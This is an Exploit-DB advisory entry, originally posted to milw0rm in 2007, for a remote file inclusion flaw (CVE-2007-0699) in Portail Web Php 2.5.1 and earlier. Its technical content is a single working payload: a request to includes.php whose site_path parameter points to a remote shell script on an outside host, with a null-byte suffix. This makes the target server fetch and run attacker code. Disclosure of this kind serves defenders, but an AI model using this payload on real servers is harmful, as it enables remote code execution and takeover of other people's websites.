Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln

EDB-ID: 3250	CVE: 2007-0699	OSVDB-ID: 33633
Author: laurent gaffiÃ©	Published: 2007-02-01	Verified:
Exploit Code:	Vulnerable App: N/A

php web portail [remote file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include
risk : high

remote file include :

/includes/includes.php?site_path=http://site.com/shell.txt?%00



laurent gaffié
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2007-02-01]

Comments

Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln

Rating

No comments so far